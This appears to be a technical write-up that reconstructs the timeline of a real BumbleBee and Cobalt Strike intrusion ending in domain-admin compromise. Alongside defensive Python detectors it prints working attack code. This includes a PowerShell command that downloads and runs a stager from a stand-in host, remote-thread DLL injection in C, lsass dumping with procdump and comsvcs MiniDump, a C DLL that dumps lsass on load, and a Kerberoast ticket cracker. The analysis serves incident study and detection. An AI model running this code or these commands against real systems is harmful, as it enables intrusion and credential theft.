
Title: Practical Case Reconstruction: From BumbleBee Sample to Domain Admin (Technical Analysis)


0 Introduction

The article 《BumbleBee Roasts Its Way To Domain Admin》 describes a real intrusion in detail, but it is organized around the ATT&CK framework rather than along the timeline, which makes it hard for penetration testers to follow what happened before and after each step. Here the case is reorganized and reconstructed along the timeline.

Original article: 《BumbleBee Roasts Its Way To Domain Admin》

1 Day 1

1.1 Sample Delivery

The sample appears to have been delivered to a machine in the target environment via a download link in an email. It is an unprotected (password-free) archive; extracting it yields the file BC_invoice_Report_CORP_46.iso. Mounting the ISO exposes an LNK file, documents.lnk; double-clicking this shortcut launches a hidden malicious loader. The shortcut target is:

C:\Windows\System32\cmd.exe /c start rundll32 namr.dll,ItalJob


1.1.1 rundll32 analysis

Loading and executing a DLL through rundll32 is common tradecraft: the malicious code runs under a signed Microsoft binary by calling an exported function of the DLL (here ItalJob in namr.dll). The same mechanism is a routine way to obtain a shell, for example with Metasploit's smb_delivery module, which hosts a DLL on an SMB share and prints the rundll32 command line to run on the target:

use exploit/windows/smb/smb_delivery

set srvhost 10.x.x.x

exploit


1.2 Loading the malicious program BumbleBee

The BumbleBee loader calls back and returns a Cobalt Strike session. Through this Cobalt Strike beacon the attacker drops wab.exe, which is executed via WMI, i.e. its parent is the WMI provider host:

C:\Windows\System32\wbem\wmiprvse.exe -secured -Embedding


wab.exe then injects malicious code into two other processes, explorer.exe and rundll32.exe. According to the original text this is classic remote-thread process injection using the Windows APIs OpenProcess, VirtualAlloc(Ex), WriteProcessMemory and CreateRemoteThread. From the description, the attacker by this point holds at least local Administrator rights, and with Administrator rights SYSTEM is normally obtainable; the article indicates that getsystem was used to elevate. A corrected and commented example of remote-thread DLL injection follows:

// Classic DLL injection: write the DLL path into the target process, then start a
// remote thread at LoadLibraryA so the target loads the DLL itself.
BOOL CreateRemoteThreadInjectDLL(DWORD dwProcessId, const char* pszDllFileName)
{
    HANDLE hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId); // open the target process
    if (hProcess == NULL)
        return FALSE;

    DWORD dwSize = 1 + ::lstrlenA(pszDllFileName); // length of the DLL path including the terminating NUL
    LPVOID pDllAddr = ::VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); // allocate in the target
    if (pDllAddr == NULL) {
        ::CloseHandle(hProcess);
        return FALSE;
    }

    ::WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL); // write the DLL path into the target

    // kernel32.dll is mapped at the same base in every process, so our LoadLibraryA address is valid there too
    FARPROC pFuncProcAddr = ::GetProcAddress(::GetModuleHandleA("kernel32.dll"), "LoadLibraryA");

    // The remote thread runs LoadLibraryA(pDllAddr) inside the target
    HANDLE hRemoteThread = ::CreateRemoteThread(hProcess, NULL, 0,
        (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, NULL);
    if (hRemoteThread != NULL) {
        ::WaitForSingleObject(hRemoteThread, INFINITE);
        ::CloseHandle(hRemoteThread);
    }
    ::CloseHandle(hProcess);
    return hRemoteThread != NULL;
}

1.3 Collected host information

The attacker ran a series of commands to collect information on the operating system, network, users, software, processes and the domain:

ipconfig /all                              # network configuration, including the DNS domain
ping -n 1 [domain]                         # test connectivity to / resolve the domain
net group "domain admins" /domain          # members of the Domain Admins group
nslookup x.x.x.x                           # resolve x.x.x.x
tasklist                                   # running processes
systeminfo                                 # OS and patch information
wmic product get name,version              # installed software
wmic /node:redacted process list brief     # processes on a remote host
net view \\redacted\Files$ /all            # list the Files$ share on a remote server
dir \\redacted\c$\                         # list the remote C: drive via the admin share
tasklist /v /s x.x.x.x                     # process details on remote host x.x.x.x
net use
net group "Domain computers" /domain
net group "Enterprise admins" /domain
net group "domain computers" /domain
net localgroup administrators
nltest /dclist
nltest /domain_trusts
ping -n 1 remote_ip

The remote commands above (wmic /node, net view and dir against \\redacted, tasklist /s) only succeed with credentials or a token valid on that server, so by this point the attacker must already hold an account for the remote server x.x.x.x.
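Because this discovery phase is a burst of short-lived commands from one beacon, the useful check is to correlate them per host rather than alert on any single command. The following Python is an added example (not code from the original article or the DFIR report) that classifies process-creation command lines into the discovery categories seen above and flags a host where several categories run within a short window, pulling out the remote targets of the commands that need credentials on another machine. The event tuples, category names, window and threshold are this example's own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Categories of discovery commands seen in this case. The category names, the
# 10-minute window and the 3-category threshold are this example's assumptions.
# "remote" is listed first because its commands also match the local patterns.
DISCOVERY_PATTERNS = {
    # commands that only work with credentials valid on the remote host
    "remote":   re.compile(r"^(wmic\s+/node:|tasklist\b.*\s/s\s|net\s+view\s+\\\\|dir\s+\\\\)", re.I),
    "domain":   re.compile(r"^(net\s+group\b.*\s/domain|nltest\s+/(dclist|domain_trusts)|net\s+accounts\s+/domain)", re.I),
    "software": re.compile(r"^wmic\s+product\b", re.I),
    "network":  re.compile(r"^(ipconfig|nslookup|ping)\b", re.I),
    "local":    re.compile(r"^(systeminfo|tasklist|net\s+localgroup|net\s+use|whoami)\b", re.I),
}
_REMOTE_TARGET = re.compile(r"(?:/node:|/s\s+|\\\\)([\w.$-]+)")


def normalize(cmdline: str) -> str:
    """Strip the 'cmd.exe /C' wrapper that Cobalt Strike's shell command prepends."""
    m = re.match(r'^"?[^"]*cmd\.exe"?\s+/c\s+(.*)$', cmdline, re.I | re.S)
    return (m.group(1) if m else cmdline).strip()


def classify(cmdline: str):
    """Return the discovery category of a command line, or None if it is not discovery."""
    cmd = normalize(cmdline)
    for category, pattern in DISCOVERY_PATTERNS.items():
        if pattern.search(cmd):
            return category
    return None


def find_discovery_bursts(events, window=timedelta(minutes=10), min_categories=3):
    """events: iterable of (iso_timestamp, host, user, command line), e.g. from Sysmon event ID 1.
    Returns {host: finding} for every host on which at least min_categories different discovery
    categories ran within `window`; the finding keeps the commands and the remote targets touched."""
    by_host = defaultdict(list)
    for ts, host, user, cmdline in events:
        category = classify(cmdline)
        if category:
            by_host[host].append((datetime.fromisoformat(ts), user, category, normalize(cmdline)))
    findings = {}
    for host, rows in by_host.items():
        rows.sort(key=lambda r: r[0])
        for i, (start, _, _, _) in enumerate(rows):
            span = [r for r in rows[i:] if r[0] - start <= window]
            categories = {r[2] for r in span}
            if len(categories) >= min_categories:
                targets = set()
                for _, _, category, cmd in span:
                    m = _REMOTE_TARGET.search(cmd) if category == "remote" else None
                    if m:
                        targets.add(m.group(1))
                findings[host] = {"user": span[0][1], "categories": categories,
                                  "remote_targets": targets, "commands": [r[3] for r in span]}
                break  # one finding per host is enough for triage
    return findings


# Constructed sample telemetry: (timestamp, host, user, command line)
SAMPLE_EVENTS = [
    ("2022-07-01T10:00:05", "WS01", "CORP\\jdoe", r"C:\Windows\system32\cmd.exe /C ipconfig /all"),
    ("2022-07-01T10:00:20", "WS01", "CORP\\jdoe", r'C:\Windows\system32\cmd.exe /C net group "domain admins" /domain'),
    ("2022-07-01T10:01:10", "WS01", "CORP\\jdoe", r"C:\Windows\system32\cmd.exe /C systeminfo"),
    ("2022-07-01T10:02:30", "WS01", "CORP\\jdoe", r"C:\Windows\system32\cmd.exe /C wmic /node:SRV01 process list brief"),
    ("2022-07-01T10:03:00", "WS01", "CORP\\jdoe", r"C:\Windows\system32\cmd.exe /C tasklist /v /s 10.0.0.5"),
    ("2022-07-01T09:00:00", "WS02", "CORP\\itops", r"C:\Windows\system32\cmd.exe /C ipconfig /all"),   # lone command
    ("2022-07-01T15:00:00", "WS02", "CORP\\itops", r"C:\Windows\system32\cmd.exe /C systeminfo"),      # hours later
]

if __name__ == "__main__":
    for host, finding in find_discovery_bursts(SAMPLE_EVENTS).items():
        print(host, finding["user"], sorted(finding["categories"]), sorted(finding["remote_targets"]))
```

On the sample data only WS01 is reported, with four categories and the remote targets SRV01 and 10.0.0.5; WS02 runs two ordinary admin commands hours apart and stays quiet. The remote targets are the hosts the analyst should check next, since reaching them implies the attacker already holds credentials there.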

1.4 Lateral movement to a server and further collection

According to the original description, the attacker used the local admin account to move laterally to a server over RDP, dropped AnyDesk.exe as a backdoor, and then began using adfind.exe (invoked here as af.exe) to continue collecting information; the server appears to be domain-joined:

cmd.exe /C af.exe -f "(objectcategory=person)" > ad_users.txt
cmd.exe /C af.exe -f "objectcategory=computer" > ad_computers.txt
cmd.exe /C af.exe -sc trustdump > trustdump.txt
cmd.exe /C af.exe -gcb -sc trustdump > trustdump.txt

2 Day 2

2.1 Continue to collect information on the server

The attacker logged in to the server again over RDP and uploaded VulnRecon, a tool built specifically to identify privilege escalation paths on Windows hosts.

3 Day 4

3.1 Continued collection on the compromised hosts

The attacker uploaded VulnRecon and the Sysinternals suite to the compromised host and to several other machines in the environment, and continued collecting information with VulnRecon, adfind, procdump and other tools. Among other things, procdump was executed via remote services to dump the memory of lsass.exe and obtain credentials. According to the description, by this point the attacker held access to several hosts and at least one server, but apparently not yet domain admin or higher privileges. The adfind activity took place on the originally compromised host, and possibly on the newly reached hosts as well:

cmd.exe /C adfind.exe -f "(objectcategory=person)" > ad_users.txt
cmd.exe /C adfind.exe -f "objectcategory=computer" > ad_computers.txt
cmd.exe /C adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
cmd.exe /C adfind.exe -sc trustdump > trustdump.txt

3.1.1 VulnRecon Analysis

VulnRecon consists of an executable and a DLL, vulnrecon.exe and vulnrecon.dll, used to enumerate privilege escalation methods and collect information. It appears to be a custom tool. It was uploaded to the originally compromised host, and possibly to the hosts reached by lateral movement as well. The PDB paths show a .NET 5 build:

# vulnrecon.dll PDB: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\standalone\Release\apphost.pdb
# vulnrecon.exe PDB: D:\work\rt\VulnRecon\VulnRecon\obj\Release\net5.0\VulnRecon.pdb

# commands observed
vulnrecon.exe -v
vulnrecon.exe -o
vulnrecon.exe -FindVulnerability
vulnrecon.exe -i
vulnrecon.exe -m
cmd.exe /c vulnrecon.exe -FindVulnerability > c:\programdata\log.txt
cmd.exe /c vulnrecon.exe -i > c:\programdata\1.txt
cmd.exe /c vulnrecon.exe -o > c:\programdata\out.txt

Privilege escalation appears to have consisted of running procdump against lsass to harvest credentials, on the originally compromised host.

3.2 Obtaining credentials from lsass

According to the description, the dump file was saved under ProgramData. It can be retrieved over SMB with net use or similar and then parsed offline with mimikatz or pypykatz. This took place on the victim hosts and servers that were discovered from the originally compromised host and reached by lateral movement.

C:\programdata\procdump64.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp

4 Day 7

4.1 Continued collection on the compromised server

The attacker continued to use VulnRecon to collect information on the server and also ran Seatbelt (a widely used host survey tool). According to the description, the server's local administrator privileges were used.

Seatbelt.exe -group=all -outputfile="C:\ProgramData\seatinfo.txt"
vulnrecon.exe -o
vulnrecon.exe -v
vulnrecon.exe -m
cmd.exe /c vulnrecon.exe -FindVulnerability > c:\programdata\log.txt

5 Day 11

5.1 New beacon on the compromised host

The attacker repeatedly executed PowerShell on the compromised host to download and run a file:

C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://a.b.c.d:80/a'))"

According to the article, the downloaded content 'a' contains the MZRE marker found in default Cobalt Strike payloads, so this is a stager connecting to the C2 address; with it the attacker obtained a fresh beacon from the compromised host to the attacker-controlled C2.

The beacon then injected into other processes; according to the original description, several processes including svchost.exe were targeted. The attacker next executed the PowerShell module Invoke-Kerberoast to start a Kerberoasting attack, again from the originally compromised host:

# parent process: svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:36177/'); Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath C:\ProgramData\REDACTED\ps.txt -append -force -Encoding UTF8
# The download from a high port on 127.0.0.1 is how Cobalt Strike serves an imported script (powershell-import) to the PowerShell process the beacon spawns.
# The output is in hashcat format, so the hashes were presumably cracked with hashcat.

5.1.1 Kerberoasting attack analysis

Kerberoasting requests a TGS service ticket for any domain account that has an SPN; the encrypted part of that ticket is encrypted with the service account's long-term key, so it can be cracked offline to recover the account's password. The original text groups it with the related AS-REP Roasting (accounts without Kerberos pre-authentication) under the names TGS- and AS-Kerberoasting. It can be carried out with Rubeus, Metasploit, Invoke-Kerberoast (PowerShell) or Impacket's GetUserSPNs.py, and the result is cracked with hashcat (mode 13100 for RC4-HMAC, etype 23; 19600 and 19700 for AES) or similar tools. Note that what is obtained is an encrypted Kerberos ticket, not a Net-NTLM hash: for etype 23 the key is the account's NT hash, so a cracked ticket yields the plaintext password (and with it the NT hash), while AES tickets use PBKDF2-derived keys and are far more expensive to crack.
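To make concrete what is cracked, here is an added Python example (not code from the original article, the DFIR report, or any of the tools named above). It builds a constructed hashcat-format $krb5tgs$23$ line for a service account from a chosen password using RFC 4757 RC4-HMAC, then tests candidate passwords against it the way a cracker does: derive the key as MD4(UTF-16LE password), decrypt with the checksum-derived RC4 key, and compare the HMAC-MD5 checksum over the plaintext. The account name, realm, SPN, password and ticket body are constructed sample values; a real ticket body is an ASN.1 EncTicketPart, which does not change the check.

```python
import hashlib
import hmac
import os
import re
import struct
from typing import Optional

# RFC 4120 key usage number for the ticket enc-part in a TGS-REP (what Kerberoasting captures)
KEY_USAGE_TGS_REP_TICKET = 2


def _md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable under OpenSSL 3."""
    M = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & M
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[idx] + k) & M, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: next step updates what is now "a"
        h = [(x + y) & M for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def _rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (used symmetrically for encrypt and decrypt)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is also the RC4-HMAC (etype 23) Kerberos key."""
    return _md4(password.encode("utf-16-le"))


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: Optional[bytes] = None) -> bytes:
    """RFC 4757 encryption: returns checksum || RC4(Ke, confounder || plaintext)."""
    ki = _hmac_md5(key, struct.pack("<I", usage))
    data = (confounder or os.urandom(8)) + plaintext
    checksum = _hmac_md5(ki, data)
    ke = _hmac_md5(ki, checksum)
    return checksum + _rc4(ke, data)


def make_kerberoast_hash(user: str, realm: str, spn: str, password: str, ticket_body: bytes) -> str:
    """Build a hashcat 13100 line of the shape Invoke-Kerberoast -OutputFormat HashCat emits.
    Used here only to construct a sample; the DC would encrypt a real EncTicketPart the same way."""
    enc = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_TGS_REP_TICKET, ticket_body)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${enc[:16].hex()}${enc[16:].hex()}"


_HASH_RE = re.compile(r"^\$krb5tgs\$(\d+)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$", re.I)


def parse_kerberoast_hash(line: str) -> dict:
    m = _HASH_RE.match(line.strip())
    if not m:
        raise ValueError("not a hashcat $krb5tgs$ line")
    etype, user, realm, spn, checksum, edata = m.groups()
    return {"etype": int(etype), "user": user, "realm": realm, "spn": spn,
            "checksum": bytes.fromhex(checksum), "edata": bytes.fromhex(edata)}


def check_candidate(parsed: dict, password: str) -> bool:
    """The per-candidate test a cracker performs: derive Ke from the candidate's NT hash and the
    checksum, decrypt, and see whether HMAC-MD5 over the plaintext reproduces the checksum."""
    if parsed["etype"] != 23:
        raise ValueError("only RC4-HMAC (etype 23) is handled here; AES tickets are modes 19600/19700")
    ki = _hmac_md5(nt_hash(password), struct.pack("<I", KEY_USAGE_TGS_REP_TICKET))
    ke = _hmac_md5(ki, parsed["checksum"])
    plaintext = _rc4(ke, parsed["edata"])
    return hmac.compare_digest(_hmac_md5(ki, plaintext), parsed["checksum"])


def crack(line: str, wordlist) -> Optional[str]:
    parsed = parse_kerberoast_hash(line)
    for candidate in wordlist:
        if check_candidate(parsed, candidate):
            return candidate
    return None
```

The checksum in the hash line doubles as the key-derivation input for the RC4 key, which is what makes the offline test possible with nothing but the captured ticket. Only etype 23 is handled: AES tickets (etypes 17 and 18) derive their keys with PBKDF2 and are the reason an attacker prefers accounts where RC4 is still allowed.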


5.2 Credential extraction with MiniDump

The attacker switched to the MiniDump export of comsvcs.dll, a credential-dumping method that in this case evaded Kaspersky. This was again initiated from the compromised host:

# parent process: svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
cmd.exe /C rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 968 C:\ProgramData\REDACTED\lsass.dmp full

Here 968 is the PID of lsass.exe; the command line itself never names lsass (and the export can also be called by ordinal as comsvcs.dll, #24), so command-line detections that only look for the string lsass miss this variant. The dump also requires SeDebugPrivilege, i.e. an elevated context.
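Since the MiniDump variant above never mentions lsass on the command line, a detection has to map the PID argument back to the process. The following Python is an added example (not code from the original article or the DFIR report) that recognises both dump shapes used in this case, procdump -ma from section 3.2 and rundll32 comsvcs.dll,MiniDump (or its ordinal #24) from here, and resolves a PID target against a process snapshot so the responder also learns which dump file to collect. The sample command lines and the process table are constructed.

```python
import re

# Command-line shapes used in this intrusion to dump lsass. In each pattern group 1 is the
# target (a process name or a PID) and group 2 the path of the dump file.
LSASS_DUMP_RULES = [
    ("procdump", re.compile(r"procdump(?:64)?\.exe.*?\s-ma\s+(lsass(?:\.exe)?|\d+)\s+(\S+)", re.I)),
    # comsvcs.dll MiniDump (export name or its ordinal #24) via rundll32: the target is only a PID
    ("comsvcs_minidump", re.compile(r"rundll32(?:\.exe)?\s+.*?comsvcs\.dll\s*,\s*(?:MiniDump|#24)\s+(\d+)\s+(\S+)", re.I)),
]


def detect_lsass_dump(cmdline: str, process_table: dict):
    """process_table maps PID -> image name on the same host at the time of the event (assumed to be
    available from process-creation telemetry). Returns a finding dict, or None for a non-match."""
    for technique, pattern in LSASS_DUMP_RULES:
        m = pattern.search(cmdline)
        if not m:
            continue
        target, dump_path = m.group(1), m.group(2)
        if target.isdigit():
            # PID form: the only way to know what was dumped is to resolve the PID
            image = process_table.get(int(target), "<unknown pid>")
        else:
            image = target if target.lower().endswith(".exe") else target + ".exe"
        return {"technique": technique, "target": target, "target_image": image,
                "dump_path": dump_path, "lsass": image.lower() == "lsass.exe"}
    return None


def triage(cmdlines, process_table):
    """Run the detector over a batch of command lines and keep only the hits."""
    return [f for f in (detect_lsass_dump(c, process_table) for c in cmdlines) if f]


SAMPLE_PROCESSES = {968: "lsass.exe", 4120: "notepad.exe"}   # constructed process snapshot
SAMPLE_CMDLINES = [                                            # constructed command lines
    r"C:\programdata\procdump64.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp",
    r"cmd.exe /C rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 968 C:\ProgramData\REDACTED\lsass.dmp full",
    r"rundll32.exe C:\windows\System32\comsvcs.dll, #24 4120 C:\Users\Public\np.dmp full",  # dumps notepad, not lsass
    r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL",                          # benign rundll32
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_CMDLINES, SAMPLE_PROCESSES):
        print(finding)
```

Any comsvcs MiniDump invocation is worth a look, but the PID resolution is what turns "rundll32 wrote a dump of PID 968" into "lsass was dumped to C:\ProgramData\REDACTED\lsass.dmp", which is the file to seize and the reason to treat every credential that was cached on that host as compromised.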

5.2.1 MiniDump analysis

The following DLL reproduces the technique in code: it looks up the PID of lsass.exe, enables SeDebugPrivilege, and calls the MiniDumpW export of comsvcs.dll with the same "<pid> <path> full" argument string that rundll32 passes:

#include <stdio.h>
#include <Windows.h>
#include <tlhelp32.h>

// Undocumented export of comsvcs.dll; rundll32 calls it as comsvcs.dll,MiniDump "<pid> <path> full"
typedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);

// Find the PID of lsass.exe by walking a process snapshot (0 if not found)
DWORD GetLsassPid() {
    PROCESSENTRY32W entry;
    entry.dwSize = sizeof(PROCESSENTRY32W);
    DWORD pid = 0;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return 0;
    if (Process32FirstW(hSnapshot, &entry)) {
        do {
            if (_wcsicmp(entry.szExeFile, L"lsass.exe") == 0) {
                pid = entry.th32ProcessID;
                break;
            }
        } while (Process32NextW(hSnapshot, &entry));
    }
    CloseHandle(hSnapshot);
    return pid;
}

// Enable SeDebugPrivilege in our token; it only exists in an elevated (admin/SYSTEM) token
BOOL GetDebugPrivilege()
{
    BOOL fOk = FALSE;
    HANDLE hToken;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValueW(NULL, L"SeDebugPrivilege", &tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        // AdjustTokenPrivileges returns TRUE even when the privilege could not be enabled,
        // so the real result is in GetLastError()
        fOk = (GetLastError() == ERROR_SUCCESS);
        CloseHandle(hToken);
    }
    return fOk;
}

// Dump lsass.exe to disk through comsvcs!MiniDumpW, exactly as the rundll32 one-liner does
void DumpLsass()
{
    wchar_t ws[100];
    HMODULE hComsvcs = LoadLibraryW(L"comsvcs.dll");
    if (hComsvcs == NULL)
        return;
    _MiniDumpW MiniDumpW = (_MiniDumpW)GetProcAddress(hComsvcs, "MiniDumpW");
    if (MiniDumpW == NULL)
        return;
    // argument string: "<pid> <output path> full"
    swprintf(ws, 100, L"%u %hs", GetLsassPid(), "c:\\windows\\temp\\temp.bin full");
    if (GetDebugPrivilege())
        MiniDumpW(0, 0, ws);
}

// The dump runs from DllMain so the DLL can simply be loaded (rundll32 or injection). Note that
// LoadLibrary inside DllMain runs under the loader lock, which works here but is fragile.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        DumpLsass();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

I compiled this file myself, and here I want to thank the former A-Team members for their insight into penetration techniques, and the foreign expert XPN for his willingness to share.


Compilation and usage reference

5.3 Continued information collection on the compromised host

adfind was used again to collect information on the initially compromised host:

cmd.exe /C adfind.exe -f "(objectcategory=person)" > ad_users.txt
cmd.exe /C adfind.exe -f "objectcategory=computer" > ad_computers.txt
cmd.exe /C adfind.exe -sc trustdump > trustdump.txt

5.4 PowerShell executed again on the initially compromised machine

The attacker again executed PowerShell on the compromised host to download and run a file:

C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://a.b.c.d:80/a'))"

This is the same stager described in 5.1 and is not repeated here.

5.5 Information collection on more machines

The following commands were executed on additional machines:

C:\Windows\system32\cmd.exe /C net accounts /domain
C:\Windows\system32\cmd.exe /C net view /all
C:\Windows\system32\cmd.exe /C whoami
C:\Windows\system32\cmd.exe /C net view \\x.x.x.x\ /all
C:\Windows\system32\cmd.exe /C wmic /node:x.x.x.x process list brief
C:\Windows\system32\cmd.exe /C net group "domain controllers" /domain
C:\Windows\system32\cmd.exe /C nltest /dclist:[domain]

5.6 Two batch scripts

The attacker uploaded and ran two scripts, s.bat and w.bat, which resolve lists of server and workstation names to IPv4 addresses in order to find further targets in the environment. Each script pings every name in its input file once, takes the address that ping prints between square brackets ("Pinging host [10.0.0.5] ..."), and appends it to a log:

# s.bat
@echo off
for /f %%i in (servers.txt) do for /f "tokens=2 delims=[]" %%j in ('ping -n 1 -4 "%%i"') do @echo %%j >> serv.log

# w.bat
@echo off
for /f %%i in (workers.txt) do for /f "tokens=2 delims=[]" %%j in ('ping -n 1 -4 "%%i"') do @echo %%j >> work.log

5.7 Final stage

After the two scripts had run, a new Cobalt Strike session was started once more on the initially compromised machine. The attacker then moved laterally with a service account and executed a Cobalt Strike beacon on the domain controller. According to the original description, this service account had a weak password, recovered by cracking its Kerberoasted TGS ticket with hashcat (see 5.1). Finally, the attacker dumped the memory of lsass.exe on the domain controller, obtaining domain admin credentials and full control of the domain.

Original source: https://www.cnblogs.com/KevinGeorge/p/16595912.html
